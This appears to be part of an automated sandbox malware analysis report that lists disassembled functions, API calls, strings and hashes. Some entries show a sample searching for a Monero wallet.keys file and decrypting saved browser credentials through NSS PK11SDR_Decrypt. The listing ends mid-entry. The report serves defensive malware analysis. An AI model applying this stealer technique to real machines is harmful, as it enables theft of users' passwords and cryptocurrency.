Instruction ID: a8061bebd7601a13fa2fc9cd4e82389340d4dccd3aa452cbfcb87c80fc1da9b6
Opcode Fuzzy Hash: d589b73b9fef8654e67c06144e0f0874d76a4063655b9808004105af3b2dfda5
Instruction Fuzzy Hash: 9B5199B65403189BC725EBB0DC89FEE737DAB54300F005589F64A96190EB74DB85CF91

Function 6C59FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C60E7B8), ref: 6C59FF81
LeaveCriticalSection.KERNEL32(6C60E7B8), ref: 6C5A022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C5A0240
EnterCriticalSection.KERNEL32(6C60E768), ref: 6C5A025B
LeaveCriticalSection.KERNEL32(6C60E768), ref: 6C5A027B

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C5A0D67, 6C5A0D7B, 6C5A0DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C59FE99, 6C59FEB7, 6C59FED3, 6C5A0DB8, 6C5A0DD3, 6C5A19B4
<jemalloc>, xrefs: 6C5A0D62, 6C5A0D76, 6C5A0DA7

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 93ffb52cccc00b5fe547b5db7ba09ca204d106f9410a37c29998aa4596da2b4d
Instruction ID: 9b1a619b2626de772592ea52cef7d2af8b945bc5a78e8292fb2dc0db1ba41f9f
Opcode Fuzzy Hash: 93ffb52cccc00b5fe547b5db7ba09ca204d106f9410a37c29998aa4596da2b4d
Instruction Fuzzy Hash: 6BC2F331A157418FD714CF6AC98071ABBE1BFC5328F28C66DE46A8B795D731E802CB85

Function 003CED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 003CED3E
FindFirstFileA.KERNEL32(?,?), ref: 003CED55
StrCmpCA.SHLWAPI(?,003E1538), ref: 003CEDAB
StrCmpCA.SHLWAPI(?,003E153C), ref: 003CEDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 003CF2AE
FindClose.KERNEL32(000000FF), ref: 003CF2C3

Strings

%s\*.*, xrefs: 003CED32

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 196c24e817c23ab149edb652ebcd5630a0902a611b23dba39b6315dc40055732
Instruction ID: 0b8c2d0e16dccfabaaba03fb9935c7238ee91383078e4a276c31036aa5f8d829
Opcode Fuzzy Hash: 196c24e817c23ab149edb652ebcd5630a0902a611b23dba39b6315dc40055732
Instruction Fuzzy Hash: 40E156738116589ADB16FB60ED92EEE773CAF54300F4041DAB40A66192EF306F8ADF51

Function 6C5AD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C60E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5BD1C5), ref: 6C5AD4F2
LeaveCriticalSection.KERNEL32(6C60E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5BD1C5), ref: 6C5AD50B

Part of subcall function 6C58CFE0: EnterCriticalSection.KERNEL32(6C60E784), ref: 6C58CFF6
Part of subcall function 6C58CFE0: LeaveCriticalSection.KERNEL32(6C60E784), ref: 6C58D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5BD1C5), ref: 6C5AD52E
EnterCriticalSection.KERNEL32(6C60E7DC), ref: 6C5AD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5AD6A6
LeaveCriticalSection.KERNEL32(6C60E7DC), ref: 6C5AD712
LeaveCriticalSection.KERNEL32(6C60E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C5BD1C5), ref: 6C5AD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C5AD7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C5AD82C
<jemalloc>, xrefs: 6C5AD827

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: aee49a92391a34b38da06bd4fa7b8ee621ad908762d0c2608549df0006f5c967
Instruction ID: 4d154110ded1c3a193947bcd42813cab32881c74d24f840a310e5e9e4eb4c2f6
Opcode Fuzzy Hash: aee49a92391a34b38da06bd4fa7b8ee621ad908762d0c2608549df0006f5c967
Instruction Fuzzy Hash: CA91E471B047118FD718DF6AC99071EB7E1EB89314F14892EE89A97A81D730E842CB46

Function 003CDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003E0C2E), ref: 003CDE5E
StrCmpCA.SHLWAPI(?,003E14C8), ref: 003CDEAE
StrCmpCA.SHLWAPI(?,003E14CC), ref: 003CDEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 003CE3E0
FindClose.KERNEL32(000000FF), ref: 003CE3F2

Strings

\*.*, xrefs: 003CDE26

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 17c612fa298f5648e1b0be2262114653cda9b3fce006adc2c2276ab5bf0bb38c
Instruction ID: 3e8830456cfe20041e6420cd94fe014fc0bf0f6fe2e3c124faa289a8b9e92636
Opcode Fuzzy Hash: 17c612fa298f5648e1b0be2262114653cda9b3fce006adc2c2276ab5bf0bb38c
Instruction Fuzzy Hash: FBF1F1728106589ACB17FB60ED95EEE7738BF14300F8041DAB40A6A191EF306F8ADF55

Function 003CC820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003CC871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003CC87C
PK11_GetInternalKeySlot.NSS3 ref: 003CC88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 003CC8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 003CC8EB
lstrcat.KERNEL32(?,003E0B46), ref: 003CC943
lstrcat.KERNEL32(?,003E0B47), ref: 003CC957
PK11_FreeSlot.NSS3(?), ref: 003CC961
lstrcat.KERNEL32(?,003E0B4E), ref: 003CC978

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: b5cb9c6aaa0bb93419ba24f712eea46be359ff5436b9d776c0191df3e141242f
Instruction ID: ee768ca1578f2b922934dd44ea182f0224fa18109eb1483ea436723cf0ddf2e7
Opcode Fuzzy Hash: b5cb9c6aaa0bb93419ba24f712eea46be359ff5436b9d776c0191df3e141242f
Instruction Fuzzy Hash: 88417EB595421ADBDB10DF90DD88FFEB7B8BB48344F1041A8E509A6280D7709A84CF91

Function 6C5D2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C5D2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C5D2C61

Part of subcall function 6C584DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C584E5A
Part of subcall function 6C584DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C584E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C5D2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C5D2E2D

Part of subcall function 6C5981B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C5981DE

Strings

ProfileBuffer parse error: %s, xrefs: 6C5D2E3B
(root), xrefs: 6C5D354F
expected a Time entry, xrefs: 6C5D2E36

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: dd8fa0fac0c2b996d6d181f5f755a7a406bb5ee4a40f5e579eca33a680b366c9
Instruction ID: 6255a4177ef08e6b30d12d783b5ce07714c20125f30fc4d4468c9dc96c13961a
Opcode Fuzzy Hash: dd8fa0fac0c2b996d6d181f5f755a7a406bb5ee4a40f5e579eca33a680b366c9
Instruction Fuzzy Hash: 2491C070608740CFC724DF28CC9469EB7F0AFC9258F11491DE99A9B751DB30E94ACB5A

Function 00798EB8 Relevance: 11.6, Strings: 8, Instructions: 1629COMMON

Download Yara Rule

Strings

K@K_, xrefs: 007995FD
L,Nd, xrefs: 00798FC9
Fl}E, xrefs: 0079A1FE
}[V, xrefs: 0079A249
b?~, xrefs: 0079A01E
##GZ, xrefs: 00799D76
&Vss, xrefs: 007998B2
J_, xrefs: 00799B0F

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ##GZ$&Vss$Fl}E$J_$K@K_$L,Nd$}[V$b?~
API String ID: 0-4138627871
Opcode ID: 1755cc5d94ef78319f99f0a54cda4fc17a180b6f81be911f82535c5cb89dea85
Instruction ID: f3e9e5c01afaa8a41ff5b9378ff5157ac338ba768e624f2e1fd393f4c704c70e
Opcode Fuzzy Hash: 1755cc5d94ef78319f99f0a54cda4fc17a180b6f81be911f82535c5cb89dea85
Instruction Fuzzy Hash: 05B228F360C2009FE304AE2DEC8567ABBE9EF98720F16893DE6C5C7744E63558058697

Function 6C58D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

1, xrefs: 6C58DBDD
, xrefs: 6C58DA88
-, xrefs: 6C58D7DD
0, xrefs: 6C58DC7F
0, xrefs: 6C58D852
8, xrefs: 6C58DC08
@, xrefs: 6C58DAF6
9, xrefs: 6C58DE7F

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: 600335bb5cfeef08350191f9fb74aab96b8d8aaea9b7b976fb3eaf89b1dc752e
Instruction ID: b2f86ad1db8e144b375a33b51e1a92a0755e9dc1a2778ed153c68cc48246df96
Opcode Fuzzy Hash: 600335bb5cfeef08350191f9fb74aab96b8d8aaea9b7b976fb3eaf89b1dc752e
Instruction Fuzzy Hash: 5062D17150E3668FDB05CF19C89075EBBF2AF86358F184A0FE4E54BA91D3359885CB82

Function 00793E00 Relevance: 10.4, Strings: 7, Instructions: 1681COMMON

Download Yara Rule

Strings

Wwg_, xrefs: 007947D8
Ic7, xrefs: 0079405A
{z}{, xrefs: 00794E62
Jtw, xrefs: 00794D32
[dkx, xrefs: 00794126
qU, xrefs: 00794C2B
_ys, xrefs: 0079435F

Memory Dump Source

Source File: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Ic7$Jtw$Wwg_$[dkx$_ys$qU${z}{
API String ID: 0-1905962850
Opcode ID: e9264c892c0bdc54370d0af4453d039d1482d21fb8659631e247abe4252282dd
Instruction ID: 6e94f6fc7fe7d2f9596fe9e07a75f17eca6ddd434ad22d033e3394c9d5276d02
Opcode Fuzzy Hash: e9264c892c0bdc54370d0af4453d039d1482d21fb8659631e247abe4252282dd
Instruction Fuzzy Hash: 56B23CF3A08204AFE3046E2DEC4567ABBE9EFD4720F1A453DE6C4C3744EA7598058796

Function 6C5F545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C5F8A4B

Strings

